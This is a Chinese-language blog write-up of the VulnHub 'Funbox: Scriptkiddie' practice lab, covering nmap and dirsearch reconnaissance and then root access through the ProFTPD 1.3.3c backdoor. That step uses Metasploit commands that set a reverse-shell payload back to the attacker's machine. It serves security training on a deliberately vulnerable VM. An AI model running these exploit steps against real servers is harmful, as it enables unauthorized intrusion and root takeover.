• Vulnhub靶场之Funbox


    正如该靶场的描述所说,它对初学者来说非常简单。
    项目地址:Funbox: Scriptkiddie ~ VulnHub
    所需工具: KaliLinux即可。

    0x00 信息收集

    打开虚拟机后使用nmap扫描一下网段存活,这里我给的虚拟机的范围是100-253,其中kali的IP是100,所以NAT模式下,靶机肯定在我扫描的这个范围。

    由图可见,靶机的IP是192.168.2.126,接下来我们来扫描一下该主机的默认端口及服务版本。

    nmap -sV 192.168.2.126  # 获取常用端口及其端口所对应的服务版本信息

    0x02 目录扫描

    有80端口的话,先扫一下目录~

    dirsearch -u http://192.168.2.126

    可以发现扫到了很多wp开头的路径,很显然这个网站是一个Wordpress框架,那么我们可以看看有没有相关文件可以看到Wordpress的版本信息

    通过查看源代码,我们可以看到wordpress的版本号为6.3.2。

    使用kali在漏洞库中搜索版本号相关信息,没有发现相关漏洞信息。后面通过wpscan扫描了一下也没有发现什么可以利用的东西,都是一些指纹信息。说明这道题的考点可能不在80端口。我们转换一下攻击方向看看其他端口有什么情况。

    0x03 ftp ProFTPD 1.3.3c

    接下来,我们将目标转向21号端口,首先尝试一下匿名登录。

    可以看到拒绝访问,应该是没有开匿名登录的功能,接下来在漏洞库搜下版本号。

    searchpol

    **我们可以看到有两条利用信息,其中第一条是远程代码执行,后面给了个绝对路径,是一个txt文件,里面是漏洞利用的源码;第二条是命令执行,可以直接通过Metasploit来利用,我们可以直接通过msf来利用,这里我们使用第二条

    0x04 Metasploit

    打开Metasploit并搜索相关漏洞信息。

    1. msfconsole
    2. msf6 > search ProFTPD 1.3.3c

    可以看到,准确搜索,刚好就是我们想要利用的模块。直接进入该模块配置相关信息。

    1. msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set rhosts 192.168.2.126
    2. rhosts => 192.168.2.126
    3. msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
    4. payload => cmd/unix/reverse
    5. msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost eth0
    6. lhost => eth0
    7. msf6 exploit(unix/ftp/proftpd_133c_backdoor) > run

    可以看到,等个大概一分钟,成功获取了靶机的控制权。

    0x05 获取FLAG

    1. ls /root
    2. cat /root/root.txt

    0x06 总结

    1. 信息收集 -> 获取目标IP
    2. 端口扫描 -> 获取目标IP的端口开放情况及服务版本信息
    3. Web端口 -> 目录扫描获取敏感信息,如果是CMS就通过版本信息搜索历史漏洞,如果不是就手工测试
    4. 其他服务端口 -> 通过服务版本在漏洞库搜索相关漏洞信息
    5. 通过FTP漏洞获取ROOT权限。
    6. 之所以说这道题简单,是因为msf攻击成功后直接是root权,不需要其他的提权操作,所以说对新手来说的话还是比较简单的。
  • 相关阅读:
    ubuntu18.04 安装网卡i219-LM驱动
    用go封装一下二级认证功能
    3.6+铁死亡+WGCNA+机器学习
    Python的计算性能优化
    如何做好商品的库存管理?哪些指标是衡量库存的指标
    CommonsCollection7反序列化链学习
    UI设计和平面设计的区别是什么?看完这篇一次搞懂
    Linux4
    java设计模式(三)——工厂方法模式
    linux后台运行命令总结
  • 原文地址:https://blog.csdn.net/qq_69775412/article/details/134282229